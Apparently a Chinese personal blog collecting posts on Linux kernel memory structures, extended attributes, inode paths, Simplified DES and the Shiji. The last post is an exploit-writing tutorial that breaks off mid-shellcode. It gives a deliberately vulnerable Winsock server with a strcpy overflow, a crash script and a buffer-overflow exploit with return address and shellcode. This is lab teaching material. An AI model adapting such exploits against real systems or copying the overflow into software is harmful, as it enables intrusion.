vmalloc()的工作方式理解起来很简单： 1.寻找一个新的连续线性地址空间； 2.依次分配一组非连续的页框； 3.为线性地址空间和非连续页框建立映射关系，即修改内核页表；

Linux进程地址空间简介

2014-10-10T00:00:00+00:00

一. 进程的地址空间

32位系统下，每一个进程可以使用的虚拟地址空间为4G,这4G包括了进程独有的和内核,windows下进程占2G，内核占2G，Linux下默认是3G和1G。有4G的地址空间，当然不可能全部用到，所有实际上只有很少一部分是分配了实际内存的。进程的地址空间由允许进程使用的全部线性地址组成。

内核通过所谓线性区的资源来表示线性地址空间，线性区是由其实线性地址、长度和一些访问权限来描述的。为了效率起见，起始地址和线性区长度都必须是4096的倍数，以便每个线性区所识别的数据完全填满分配给它的页框。内核可以通过增加或删除某些线性地址区间来动态修改进程的地址空间。

二. 内存描述符

与进程地址空间有关的全部信息都包含在一个叫做内存描述符的数据结构中，这个结构的类型为mm_struct，进程描述符的mm字段就指向这个结构。mm_struct定义如下。

struct mm_struct {
    struct vm_area_struct * mmap;        /* list of VMAs */
    struct rb_root mm_rb;
    struct vm_area_struct * mmap_cache;    /* last find_vma result */
    unsigned long free_area_cache;        /* first hole */
    pgd_t * pgd;
    atomic_t mm_users;            /* How many users with user space? */
    atomic_t mm_count;            /* How many references to "struct mm_struct" (users count as 1) */
    int map_count;                /* number of VMAs */
    struct rw_semaphore mmap_sem;
    spinlock_t page_table_lock;        /* Protects task page tables and mm->rss */

    struct list_head mmlist;        /* List of all active mm's.  These are globally strung
                         * together off init_mm.mmlist, and are protected
                         * by mmlist_lock
                         */

    unsigned long start_code, end_code, start_data, end_data;
    unsigned long start_brk, brk, start_stack;
    unsigned long arg_start, arg_end, env_start, env_end;
    unsigned long rss, total_vm, locked_vm;
    unsigned long def_flags;

    unsigned long saved_auxv[40]; /* for /proc/PID/auxv */

    unsigned dumpable:1;
    cpumask_t cpu_vm_mask;

    /* Architecture-specific MM context */
    mm_context_t context;

    /* coredumping support */
    int core_waiters;
    struct completion *core_startup_done, core_done;

    /* aio bits */
    rwlock_t        ioctx_list_lock;
    struct kioctx        *ioctx_list;

    struct kioctx        default_kioctx;
};

下面介绍一些比较重要的字段。

* mmap 指向线性区对象的链表头，具体下一部分介绍。
* mm_rb指向线性区对象的红-黑树的根。mmap 和 mm_rb 这两个不同数据结构体描述的对象是相同的：该地址空间中的所有内存区域。mmap 指向一个 vm_area_struct 结构的链表，利于简单、高效地遍历所有元素。 mm_rb 指向的是一个红-黑树结构节点，适合搜索指定元素。
* pgd 指向第一级页表即页全局目录的基址，当内核运行这个进程时，它就将pgd存放在CR3寄存器内，根据它来进行地址转换工作。
* mmlist 将所有的内存描述符存放在一个双向链表中，第一个元素是init_mm的mmlist字段。
* mm_users 存放共享mm_struct数据结构的轻量级进程的个数。
* mm_count mm_count字段是内存描述符的主使用计数器，在mm_users次使用计数器中的所有用户在mm_count中只作为一个单元。每当mm_count递减时，内核都要检查它是否变为0，如果是，就要解除这个内存描述符，因为不再有用户使用它。

mm_count 代表了对 mm 本身的引用，而 mm_users 代表对 mm 相关资源的引用，分了两个层次。mm_count类似于以进程为单位。 mm_users类似于以线程为单位。内核线程在运行时会借用其他进程的mm_struct,这样的线程叫”anonymous users”, 因为他们不关心mm_struct指向的用户空间,也不会去访问这个用户空间，他们只是临时借用，m_count记录这样的线程。 mm_users是对mm_struct所指向的用户空间进行共享的所有进程的计数，也就是说会有多个进程共享同一个用户空间。

三. 线性区

Linux通过类型为vm_area_struct的对象对线性区进行管理，其定义如下：

struct vm_area_struct {
	struct mm_struct * vm_mm;	/* The address space we belong to. */
	unsigned long vm_start;		/* Our start address within vm_mm. */
	unsigned long vm_end;		/* The first byte after our end address within vm_mm. */

	/* linked list of VM areas per task, sorted by address */
	struct vm_area_struct *vm_next;

 	pgprot_t vm_page_prot;		/* Access permissions of this VMA. */
	unsigned long vm_flags;		/* Flags, listed below. */

 	struct rb_node vm_rb;

	union {
		 struct {
			struct list_head list;
			void *parent;	/* aligns with prio_tree_node parent */
			struct vm_area_struct *head;
		} vm_set;

		struct raw_prio_tree_node prio_tree_node;
 	} shared;

	struct list_head anon_vma_node;	/* Serialized by anon_vma->lock */
	struct anon_vma *anon_vma;	/* Serialized by page_table_lock */

	/* Function pointers to deal with this struct. */
 	struct vm_operations_struct * vm_ops;

	/* Information about our backing store: */
	unsigned long vm_pgoff;		/* Offset (within vm_file) in PAGE_SIZE
					   units, *not* PAGE_CACHE_SIZE */
	struct file * vm_file;		/* File we map to (can be NULL). */
	void * vm_private_data;		/* was vm_pte (shared mem) */
	unsigned long vm_truncate_count;/* truncate_count or restart_addr */
};

每一个线性区描述符表示一个线性地址区间。vm_start字段包含区间的第一个线性地址，vm_end字段包含区间之外的第一个线性地址。vm_end-vm_start表示线性区的长度。vm_mm字段指向拥有这个区间的进程的mm_struct内存描述符。

进程所拥有的线性区从来不重叠，并且内核尽力把新分配的线性区与紧邻的现有线性区进行合并。如果两个相邻区的访问权限相匹配，就能把它们合并在一起。如下图所示，当一个新的线性地址加入到进程的地址空间时，内核检查一个已经存在的线性区是否可以扩大（情况a）。如果不能，就创建一个新的线性区（情况b）。类似地，如果从进程地址空间删除一个线性地址空间，内核就要调整受影响的线性区大小（情况c）。有些情况下，调整大小迫使一个线性区被分成两个更小的部分（情况d）。

进程所拥有的所有线性区是通过一个简单的链表链接在一起的。出现在链表中的线性区是按内存地址的升序排列的；不过，每个线性区可以由未使用的内存地址区隔开。每个vm_area_struct元素的vm_next字段指向链表的下一个元素。内核通过检查描述符mmap字段来查找线性区，其中mmap字符指向链表中的第一个线性区描述符。下图显示了进程的地址空间、它的内存描述符以及线性区链表三者之间的关系。

为了提高访问线性区的性能，Linux也使用了红-黑树。这两种数据结构包含指向同一线性区描述符的指针，当插入或删除一个线性区描述符时，内核通过红-黑树搜索前后元素，并用搜索结果快速更新链表而不用扫描链表。一般来说，红-黑树用来确定含有指定地址的线性区，而链表通常在扫描整个线性区集合时来使用。

下面随便看看一个进程的线性区。

struct task_struct *t = pid_task(find_get_pid(2576),PIDTYPE_PID);
struct mm_struct * mm = t->mm;
struct vm_area_struct* vma = mm->mmap;
int i;
for(i = 0;i < mm->map_count;++i)
{
    printk("0x%x-----0x%x\n",vma->vm_start,vma->vm_end);
    vma = vma->vm_next;
}

通过dmesg看结果如下图。

这与通过cat /proc/2576/maps命令看的是一致，只有栈部分有少许差别。

Linux文件扩展属性以及从内核中获得文件扩展属性

2014-10-09T00:00:00+00:00

扩展属性(EA)就是以名称-值对形式将任意元数据与文件i节点关联起来的技术。EA可以用于实现访问列表和文件能力，还可以利用EA去记录文件的版本号、与文件的MIME类型/字符集有关的信息等，反正想干嘛就干嘛吧。

EA的命名格式为namespace.name。其中namespace用来把EA从功能上划分为截然不同的几大类，而name则用来在既定命名空间内唯一标示某个EA。

Linux定义了4中namespace：user、trusted、system和security。

user EA:在文件权限检查的制约下由非特权级进程操控。
trusted EA:也可由用户进程“驱使”，与user EA相似。区别在于，要操纵trusted EA，进程必须具有特权(CAP_SYS_ADMIN)。
system EA:供内核使用，将系统对象与一文件关联。目前仅支持访问控制列表。

security EA:作用有二：其一，用来存储服务于操作系统安全模块的文件安全标签；其二，将可执行文件与能力关联起来。

  kvm@ubuntu:~$ touch filetest
  kvm@ubuntu:~$ setfattr -n user.x -v "The past is not dead." filetest 
  kvm@ubuntu:~$ setfattr -n user.y -v "In fact,it's not even past." filetest 
  kvm@ubuntu:~$ getfattr -n user.x filetest 
  # file: filetest
  user.x="The past is not dead."
	
  kvm@ubuntu:~$ getfattr -d filetest 
  # file: filetest
  user.x="The past is not dead."
  user.y="In fact,it's not even past."
	
  kvm@ubuntu:~$ setfattr -n user.x filetest    //设置EA的值为一个空字符串
  kvm@ubuntu:~$ getfattr -d filetest 
  # file: filetest
  user.x
  user.y="In fact,it's not even past."
	
  kvm@ubuntu:~$ setfattr -x user.y filetest //删除一个EA
  kvm@ubuntu:~$ getfattr -d filetest 
  # file: filetest
  user.x

应用层的函数就不说了，下面简单介绍一下在内核层中获取文件的EA。一小段测试代码如下，主要是通过inode结构中操作getxattr来得到，当然之前需要得到dentry。

static int hello_init()
{
	struct file *f;
	struct inode *node;
	struct dentry *dent;
	int rc;
	char in[100];
	printk(KERN_ALERT "Hello, world\n");
	printk(KERN_ALERT "name:%s\n",current->comm);
	f = filp_open("/home/kvm/tfile",O_RDONLY,0);
	dent = f->f_path.dentry;
	node = dent->d_inode;
	if (node->i_op->getxattr == NULL)
	{
	    printk("inode's getxattr is null!\n");
	    return 0;
	}
	rc = node->i_op->getxattr(dent, "user.x", in, 100);
	if (rc < 0)
		return 0;
	printk("the user.x is:%s\n",in);
	return 0;
}

输出为：

the user.x is:The past is not dead.

Linux内核中从inode结构得到文件路径名

2014-08-31T00:00:00+00:00

最近的一个需求，从文件的inode得到全路径名。顺便总结一下Linux系统中的file,path,dentry,inode结构。

概述
各个结构
从inode得到文件绝对路径

1.概述

构成一个操作系统最重要的部分就是进程管理和文件系统了。

Linux最初采用的是minix的文件系统，minix是由Andrew S. Tanenbaum开发的用于实验性的操作系统，比如有一些局限性。后来经过一段时间的改进和发展，Linux开发出了ext2文件系统，当然后来逐渐发展除了ext3、ext4。为了使Linux支持各种不同的文件系统，Linux使用了所谓的虚拟文件系统VFS(Virtual Filesystem Switch)，VFS提供一组标准的、抽象的文件操作，以系统调用的形式提供给用户程序，如read(),write(),lseek()等。这样，用户程序就可以把所有的文件都看作一致的、抽象的”VFS文件”，通过这些系统调用对文件进行操作，而无需关心具体的文件属于什么文件系统以及具体文件系统的设计和实现。VFS与具体文件系统的关系如图1所示。

2.各个结构

不同的文件系统通过不同的程序来实现其各种功能，但是与VFS之间的界面则是有明确的定义。这个界面的主体就是file_operations数据结构。定义在include/linux/fs.h中：

struct file_operations {
	struct module *owner;
	loff_t (*llseek) (struct file *, loff_t, int);
	ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
	ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
	ssize_t (*aio_read) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
	ssize_t (*aio_write) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
	int (*readdir) (struct file *, void *, filldir_t);
	unsigned int (*poll) (struct file *, struct poll_table_struct *);
	long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long);
	long (*compat_ioctl) (struct file *, unsigned int, unsigned long);
	int (*mmap) (struct file *, struct vm_area_struct *);
	int (*open) (struct inode *, struct file *);
	int (*flush) (struct file *, fl_owner_t id);
	int (*release) (struct inode *, struct file *);
	int (*fsync) (struct file *, loff_t, loff_t, int datasync);
	int (*aio_fsync) (struct kiocb *, int datasync);
	int (*fasync) (int, struct file *, int);
	int (*lock) (struct file *, int, struct file_lock *);
	ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int);
	unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);
	int (*check_flags)(int);
	int (*flock) (struct file *, int, struct file_lock *);
	ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
	ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
	int (*setlease)(struct file *, long, struct file_lock **);
	long (*fallocate)(struct file *file, int mode, loff_t offset,
			  loff_t len);
};

每个文件系统都有自己的file_operations结构，结构中的成分几乎全是函数指针，所以实际上是个函数跳转表，例如read就指向具体文件系统用来实现读文件操作的入口函数。

每个进程通过open()与具体的文件建立起连接，这种连接以一个file数据结构作为代表，结构中有个file_operations结构指针f_op。将file结构中的指针f_op设置成指向某个具体的file_operations结构，就指定了这个文件所属的文件系统。

struct files_struct {
  /*
   * read mostly part
   */
	atomic_t count;
	struct fdtable __rcu *fdt;
	struct fdtable fdtab;
  /*
   * written part on a separate cache line in SMP
   */
	spinlock_t file_lock ____cacheline_aligned_in_smp;
	int next_fd;
	struct embedded_fd_set close_on_exec_init;
	struct embedded_fd_set open_fds_init;
	struct file __rcu * fd_array[NR_OPEN_DEFAULT];
};

进程的task_struct中有一个类型为struct files_struct的files域，记录了具体已打开的文件信息。files_struct的主体就是一个file结构数组。每打开一个文件以后，进程就通过一个“打开文件号”fid来访问这个文件，而fid实际上就是相应file结构在数组中的下标。file结构中海油一个指针f_dentry，指向该文件的dentry数据结构。每一个文件只有一个dentry结构，而可能有多个进程打开它。

struct dentry {
	/* RCU lookup touched fields */
	unsigned int d_flags;		/* protected by d_lock */
	seqcount_t d_seq;		/* per dentry seqlock */
	struct hlist_bl_node d_hash;	/* lookup hash list */
	struct dentry *d_parent;	/* parent directory */
	struct qstr d_name;
	struct inode *d_inode;		/* Where the name belongs to - NULL is
					 * negative */
	unsigned char d_iname[DNAME_INLINE_LEN];	/* small names */

	/* Ref lookup also touches following */
	unsigned int d_count;		/* protected by d_lock */
	spinlock_t d_lock;		/* per dentry lock */
	const struct dentry_operations *d_op;
	struct super_block *d_sb;	/* The root of the dentry tree */
	unsigned long d_time;		/* used by d_revalidate */
	void *d_fsdata;			/* fs-specific data */

	struct list_head d_lru;		/* LRU list */
	/*
	 * d_child and d_rcu can share memory
	 */
	union {
		struct list_head d_child;	/* child of parent list */
	 	struct rcu_head d_rcu;
	} d_u;
	struct list_head d_subdirs;	/* our children */
	struct list_head d_alias;	/* inode alias list */
};

dentry结构中有一个指向inode的指针。dentry与inode结构所描述的目标是不一样的，因为一个文件可能对应多个文件名（链接）。所以dentry结构代表的是逻辑意义上的文件，记录的是其逻辑上的属性。而inode结构所代表的是物理意义上的文件，记录的是其物理上的属性；它们之间的关系是多对一的关系。这是因为一个已经建立的文件可以被连接 (link) 到其他文件名。dentry中还有个d_parent指向父目录的dentry结构。

inode数据结构比较大，就不列出来了。要注意的是inode结构中有一个i_dentry是所有与这个inode关联的dentry。凡是代表着这个文件的所有目录项都通过其dentry结构中的d_alias挂入相应inode结构中的 i_dentry 队列。

下面是需要注意的几点：

进程每打开一个文件，就会有一个file结构与之对应。同一个进程可以多次打开同一个文件而得到多个不同的file结构，file结构描述被打开文件的属性，如文件的当前偏移量等信息。
两个不同的file结构可以对应同一个dentry结构。进程多次打开同一个文件时，对应的只有一个dentry结构。dentry结构存储目录项和对应文件（inode）的信息。
在存储介质中，每个文件对应唯一的inode结点，但是每个文件又可以有多个文件名。即可以通过不同的文件名访问同一个文件。这里多个文件名对应一个文件的关系在数据结构中表示就是dentry和inode的关系。
inode中不存储文件的名字，它只存储节点号；而dentry则保存有名字和与其对应的节点号，所以就可以通过不同的dentry访问同一个inode。
不同的dentry则是同个文件链接（ln命令）来实现的。

因此关系就是：进程->task_struct->files_struct->file->dentry->inode->Data Area

3.从inode得到文件绝对路径

有了上面的基础，从inode得到文件名就比较简单了，这里我假设文件只有一个路径，如果有很多路径改改就行了。

char *getfullpath(struct inode *inod,char* buffer,int len)
{
	struct list_head* plist = NULL;
	struct dentry* tmp = NULL;
	struct dentry* dent = NULL;
	struct dentry* parent = NULL;
	char* name = NULL;
	char* pbuf = buffer + PATH_MAX - 1;
	struct inode* pinode = inod;
	int length = 0;

	buffer[PATH_MAX - 1] = '\0';
	if(pinode == NULL)
		return NULL;
	list_for_each(plist,&pinode->i_dentry)
	{
		tmp = list_entry(plist,struct dentry,d_alias);
		if(tmp->d_inode == pinode)
		{
			dent = tmp;
			break;
		}
	}
	if(dent == NULL)
	{
		return NULL;
	}
	name = (char*)(dent->d_name.name);
	name = name + strlen(name) - 4;
	if(!strcmp(name,".img"))
	{
	    while(pinode && pinode ->i_ino != 2 && pinode->i_ino != 1)
		{
			if(dent == NULL)
				break;
			name = (char*)(dent->d_name.name);
			if(!name)
				break;
			pbuf = pbuf - strlen(name) - 1;
			*pbuf = '/';
			memcpy(pbuf+1,name,strlen(name));
			length += strlen(name) + 1;
			if((parent = dent->d_parent))
			{
				dent = parent;
				pinode = dent->d_inode;
			}
		}
		printk(KERN_INFO "the fullname is :%s \n",pbuf);
	}
	return pbuf;
}

《史记·殷本纪第三》笔记

2014-04-21T00:00:00+00:00

史记的这篇能记的不多，是讲殷商的历史的。

首先说说伊尹这个人，相传伊尹为了认识汤，作为有莘氏的媵臣，也就是陪嫁奴隶，然后借着向汤做饭的机会向汤讲述做王的道理，分析天下大势。于是汤封他做了宰相。据传伊尹也是一代名厨，由厨师到宰相，这跨度还是有点大，这充分说明别拿厨师不当人才。

伊尹历事商超汤、外丙、仲壬、太甲、沃丁五代帝王，为商超立下汗马功劳。这种权臣一般都容易出问题，还好伊尹是个好人。太甲即为时，暴虐，不遵汤法，乱德。于是伊尹将其流放到了桐宫。三年之后，太甲改过自新，伊尹再次迎回太甲，帝太甲也成了一个好皇帝。

《殷本纪》其实记录得比较流水，大概就是x崩，y立。y崩，z立。这种格式，只有对最后一位昏君商纣介绍得比较详细。

帝纣资辨捷疾，闻见甚敏；材力过人，手格猛兽；知足以距谏，言足以饰非；矜人臣以能，高天下以声，以为皆出己之下。

上面是太史公对纣的描写。单从前四句确实奇才，有这种资质，加上生在帝王之家，确实是很容易骄傲自大，“以为皆出己之下”，这是有多狂妄。纣真的是各种荒淫无道。因为九侯的女儿不喜欢这种荒淫，尽然连累父亲被杀，鄂侯因为争论也被杀，西伯昌因为悄悄叹了一口气就被流放。还好昌的手下进献各种宝物才让西伯免于一死。而之后才有了西伯之后纣，武王伐纣的历史。

我从小遇到的聪明人不少，而正如吕老师所说，如果聪明没有办法转换成智慧，那就什么都不是。我觉得聪明的人第一点就是千万不要自大，不管是家境，智力都不应该是傲慢的资本，更不用那些技术了。不知道那些聪明的家伙现在都怎么样了。

《史记·夏本纪第二》笔记

2014-04-20T00:00:00+00:00

这篇读完也就结束了尧舜禹禅让的时代，进入了皇权世袭制的时代。这里记录下关于禅让与世袭的一些思考。

读过《五帝本纪》的人都知道，其实五帝都是一个家族的，都是黄帝的后代，但是后代为什么把这个世袭的罪责归到了禹身上。大概是因为黄帝传了后代之后，出现了尧舜禹禅让（虽然是一家人，其实关系已经很远了），而禹传启之后再也没有过禅让了，世袭成为大家所公认的制度。

尧死后，舜也曾经让过帝位给尧的儿子丹朱，但是当时的人们都知道舜的贤能，而不去朝见丹朱（估计丹朱也知道自己没戏），舜就自然当上了皇帝。

同样的情况出现在禹跟舜的儿子商均身上，禹也是假吧意思的让了一下，天下人还是去朝见禹，然后禹也当上了皇帝。

禹选择继承人的时候本身也没有想过自己的儿子，他先选的是皋陶，是禹时代的一个贤臣。但是不幸的是，皋陶死了。接着又选了益来掌管国家大事，但是益辅佐禹的时间并不长，并没有得到天下人的认同。禹意思，他也让位给禹的儿子启，而恰恰是这个启，又是一个十分贤能的人，大家就都认他，而不认益了。

“禹传子，家天下”的说法就来了。

我们回过头来看看这个禅让制，它的思想是通过在位的君主来挑选那些贤能继承自己的帝位，人本身不可能没有私心。尧舜禹可以说是做到了没有私心，但是这维持了多久呢。这再一次说明了制度的重要胜于人事。后人只需要按照制定的制度做就行，而谁能保证君主始终是一个贤君呢。

一个身处全力顶峰的人很容易受到人民的狂热崇拜以至于犯下错误而不可知，我第一次读到“皋陶于是敬禹之德，令民皆则禹。不如言，刑从之。”这句话的时候还是震惊了一下的，不顺从他说的，就要受刑罚。这不是一个黑暗的社会吗。美国在罗斯福之前总统不超过两届的习惯是大家效仿开国之父华盛顿的两届离职，而罗斯福因为经济危机和二战连任四届总统，似乎也是无可厚非。然后美国在战后还是通过修宪制定了总统任期不能超过两届的修正案。

这是一种对制度的信任。

Simplified DES简介

2014-04-17T00:00:00+00:00

Simplified DES是由Edard Schaefer教授开发的用于教学的简单加密算法，它与DES有着相似的属性与结构，只是参数比较小而已。通过这种简单的，能够实现手工加解密的算法能让我们加深对DES的理解。

概述

图1是simplified DES（下称S-DES)的总体结构图。S-DES加密算法使用8位明文（如10111101）和10位密钥作为输入，产生8位密文。相反的，S-DES解密算法使用8位密文和10位相同的密钥作为输入，生产8位明文。

加密算法包括5个函数：初始的置换函数($IP{}^{}$)；一个复杂的函数$f{}_{k}$，这个函数包括取决于输入的置换和替换操作；一个简单的置换函数$SW$，用于置换输入数据的前后2个部分；然后又是$f{}_{k}$；最后是初始置换函数的逆（$IP{}^{-1}$）。

$f{}_{k}$的输入包括明文和8位密钥，我们可以使用16位的密钥，每一轮使用8位（共两轮$f{}_{k}$），也可以使用8位密钥，每一次都使用相同的密钥。作为折中，我们使用了10位密钥，每一次的$f{}_{k}$通过移位产生8位密钥。两个密钥的产生如图2：

这个算法中，密钥首先通过一个置换函数（$P10$）。然后左移一位，输出通过一个置换函数（$P8$），产生第一个密钥$K_{1}$。左移一位之后的结果再进行移位和置换（$P8$），产生第二个密钥$K_{2}$。

我们将S-DES的加密算法使用函数组合表达如下：

\[IP^{-1}\circ f_{K_{2}}\circ SW\circ f_{K_{1}}\circ IP\]

也就是

\[ciphertext = IP^{-1}(f_{K_{2}}(SW(f_{K_{1}}(IP(plaintext)))))\]

其中

\[K_{1} = P8(Shift(P10(key))) K_{2} = P8(Shift(Shift(P10(key))))\]

解密算法也在图1中，可以表示成加密算法的逆运算。

\[plaintext = IP^{-1}(f_{K_{1}}(SW(f_{K_{2}}(IP(ciphertext)))))\]

S-DES密钥生成

图2显示了子密钥的生成。

首先，按照一定方式对输入密钥进行置换。如输入的10位密钥是$(k_{1},k_{2},k_{3},k_{4},k_{5},k_{6},k_{7},k_{8},k_{9},k_{10})$。 $P10$如下定义：

\[P10(k_{1},k_{2},k_{3},k_{4},k_{5},k_{6},k_{7},k_{8},k_{9},k_{10}) = (k_{3},k_{5},k_{2},k_{7},k_{4},k_{10},k_{1},k_{9},k_{8},k_{6})\]

P10可以简单表示如下：

这个表的意思就是说第一个输出是输入的第3位，第二个输出是输入的第5位，以此类推。如，密钥1010000010被置换成1000001100。

接下来进行循环左移一位(LS-1)，是将密钥分成左右两部分（每部分5位），左右各循环左移一位。这个例子中，得到00001 11000.

接着执行$P8$，从10位输出中选出8位密钥，P8定义如下：

结果就是第一个子密钥($K_{1}$），在我们这个例子中，是10100100。

然后利第一次左移一位产生的一对5位数据（00001 11000）进行左移两位。这个例子中的结果是00100 00011。最后，通过P8之后结果产生 $K_{2}$。这个例子中是01000011。

S-DES加密

图3展示了S-DES加密算法的细节。这部分详细介绍加密流程中的5个函数。

初始和结尾的置换函数：

对于输入的8位明文，我们需要使用$IP$对其进行重新置换：

在算法末尾，需要进行相反的操作：

可以验证$IP^{-1}(IP(X)) = X$。

$f_{K}$函数：

S-DES中最复杂的部分就是函数$f_{K}$了，这个函数包含了置换的和替换的组合。这个函数解释如下。首先让L和R分别表示$f_{K}$8位输入的左边4位和右边4位，F是一个4位到4位的映射。则

\[f_{K}(L,R) = (L\oplus F(R,SK),R)\]

SK是一个子密钥。

下面解释F。它的输入是4位数$(n_{1} n_{2} n_{3} n_{4})$，第一个操作是扩展与置换：

为了方便起见，写成如下形式：

将8位的子密钥$K_{1} = (k_{11},k_{12},k_{13},k_{14},k_{15},k_{16},k_{17},k_{18})$与上面的数进行异或：

重新命名这8个数：

前面4位用于在第一个S盒产生一个2位输出，后面4位在第二个S盒产生一个2位输出，两个S盒定义如下：

S盒操作如下：第一个和第四个输入作为一个2位数指定S盒中的一行，第二和第三个输入作为一个2位数指定S盒中的一列。比如$(p_{0,0}p_{0,3})=(00)$ 和$(p_{0,1}p_{0,2})=(10)$ ，则输出是S盒的第一行第二列这里是3（二进制的11），类似的$(p_{1,0}p_{1,3})$ 和$(p_{1,1}p_{1,2})$的值找到在第二个S盒中的值。

接着，由两个S盒产生的4位置通过一个置换函数$P4$：

$P4$的输出就是F的输出。

SW函数：

$f_{K}$函数仅仅处理左边的4位，SW函数将左右互换然后就处理了后面的4位。第二轮的$f_{K}$中，E/P,S0,S1和P4都跟第一轮一样的，只有子密钥变成了$K_{2}$。

在网上找到了一个S-DES的例子，希望大家能自己走一遍流程。

S-DES

《史记·五帝本纪第一》笔记

2014-04-15T00:00:00+00:00

最近因为在Coursera上面跟台大吕世浩老师的《史记》，自己准备重新认真学习一下史记。在这里做些笔记。

《史记》是我在高中的时候看的，当时关注的是优美的文字与故事情节，现在听了吕世浩老师的课，觉得很有必要重新看一遍，然后自己买了三家注的《史记》，繁体竖版，质量好，很值得收藏啊。

上周周末把《史记》第一篇《五帝本纪第一》看完了，在这里做个总结。

首先五帝的关系如下图所示：

图中红色字体表示的就是五帝。

黄帝：不用多说了，所谓的炎黄子孙中的黄就是他。黄帝通过阪泉之战战胜了炎帝，通过逐鹿之战战胜了蚩尤，得有天下。

高阳：就是颛顼了。

高辛：就是帝喾。

放勋：帝尧，他哥挚当皇帝不行，他就上了。

重华：帝舜，帝尧到帝舜这都隔了多少代了，神话还是神话啊。

尧舜禅让历来为人们所乐道，部落联盟推举制度也是自古就有的。尧舜禅让与部落联盟推举天子的制度至少有三方面的不同。

生让：其他部落联盟推举天子都是前一任的天子死掉，大家再决定下一任的继承者，尧舜都是活着就在找人了；

侧陋：是说尧找继承人的时候不是说一定要身边的贵族，即使是民间隐匿者也可以是，只要你有能力；

试可：这是最重要的，因为是生让，所以才可以试可，在活着的时候就要多方考验这个人，看这个人足不足以担当大任。

这是三个最重要的不同，也是中国文化的精神。这种精神是说天下乃是重器，不可轻易授之于人。所谓“夫天下至重也”。因为至重，交给一个人的时候一定要格外小心，不能够有自己的私心，也要多方考验，这个人是否足以承担大任。这就是中国人禅让真正的思想。

五帝本纪上说：

自黄帝至舜、禹，皆同姓而异其国号，以章明德。故黄帝为有熊，帝颛顼为高阳，帝喾为高辛，帝尧为陶唐，帝舜为有虞。帝禹为夏后而别氏，姓姒氏。契为商，姓子氏。弃为周，姓姬氏。

这段话是说夏商周三代以前的历代帝王全都是黄帝的子孙。司马迁以此找出一个天下一家的来源，相信所有的人都有共同的来源，太史公所以以黄帝为中华民族的始祖，就是这个原因。

自古三皇五帝就有很多传说，《尚书》记载的是尧以来的事，百家言黄帝各有各的说法，那个时候各种传说流传，缙绅也不知道怎么评价黄帝。作为历史学家的司马迁怎么办呢？

“余尝西至空桐，北过涿鹿，东渐於海，南浮江淮矣，至长老皆各往往称黄帝、尧、舜之处，风教固殊焉，总之不离古文者近是。”

司马迁于是走访各处，访问当地的人民，查阅古籍，得出了“不离古文者近是”的结论。司马迁写下一句意味深长的话：

非好学深思，心知其意，固难为浅见寡闻道也。

太史公为了后来读《史记》的人确立一个阅读的基本原则：要读懂我这本书，一定要是好学深思，心知其意的人。

读完《五帝本纪》需要注意一个现象，整篇文章只言治不言乱，并不是因为太史公捏造事实，而是太史公觉得这是中国最好的政治理想，而且他相信这个理想曾经是存在过的。

exploit编写笔记3——编写Metasploit exploit

2014-04-08T00:00:00+00:00

这是exploit编写笔记第三篇，编写metasploit exploit。首先，编写一个带有缓冲区溢出漏洞的服务器端程序。

// server.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"

#include <iostream.h>
#include <winsock.h>
#include <windows.h>

//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0

void pr( char *str)
{
   char buf[500]="";
   strcpy(buf,str);
}
void sError(char *str)
{
   MessageBox (NULL, str, "socket Error" ,MB_OK);
   WSACleanup();
}

int main(int argc, char **argv)
{

WORD sockVersion;
WSADATA wsaData;

int rVal;
char Message[5000]="";
char buf[2000]="";

u_short LocalPort;
LocalPort = 200;

//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);

//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);

if(serverSocket == INVALID_SOCKET)
{
   sError("Failed socket()");
   return SS_ERROR;
}

SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;

//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
   sError("Failed bind()");
   WSACleanup();
   return SS_ERROR;
}

//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
   sError("Failed listen()");
   WSACleanup();
   return SS_ERROR;
}

//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
   sError("Failed accept()");
   WSACleanup();
   return SS_ERROR;
}

int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
   //receive the data that is being sent by the client max limit to 5000 bytes.
   bytesRecv = recv( clientSocket, Message, 5000, 0 );

   if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
   {
      printf( "\nConnection Closed.\n");
      break;
   }
}

//Pass the data received to the function pr
pr(Message);

//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);

WSACleanup();

return SS_OK;
}

向该服务程序发送超过500字节的数据时，会造成其崩溃。下面的python脚本会出发崩溃：

import socket

data = 'A' * 1000
s= socket.socket()
s.connect(('localhost',200))
s.send(data)
s.close()

使用mona pattern确定其eip偏移在504。

查找一个push esp ;ret 序列，我们找的是71a22b53，用这个值覆盖eip。shellcode我们随便使用一个Messagebox。

得到一个如下的python脚本：

import socket

data = "A" * 504

#71a22b53  
data += "\x53\x2b\xa2\x71"
shellcode = ("\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
    "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
    "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
    "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
    "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
    "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
